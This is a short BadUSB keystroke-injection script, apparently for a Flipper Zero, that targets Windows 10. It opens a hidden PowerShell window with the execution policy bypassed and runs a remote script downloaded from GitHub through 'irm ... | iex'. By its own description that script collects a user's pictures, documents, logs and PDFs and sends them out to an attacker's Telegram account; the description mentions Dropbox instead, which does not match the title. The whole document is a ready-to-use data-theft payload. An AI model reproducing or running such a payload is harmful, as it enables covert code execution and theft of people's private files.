
REM Title: beigeworm's Exfiltrate files to Telegram
REM Author: @beigeworm
REM Description: This script searches the users folder fot pictures, documents, logs, PDFs and more, then sends its all to a dropbox account.
REM Target: Windows 10

REM *SETUP*
REM replace TELEGRAM_TOKEN with your Telegram Token.

REM some setup for dukie script
DEFAULT_DELAY 100

REM open powershell (remove -W Hidden to show the window)
DELAY 1000
GUI r
DELAY 750
STRING powershell -NoP -Ep Bypass -W H -C $tg='TELEGRAM_TOKEN'; irm https://raw.githubusercontent.com/beigeworm/BadUSB-Files-For-FlipperZero/main/Exfiltrate-to-Telegram/main.ps1 | iex
ENTER

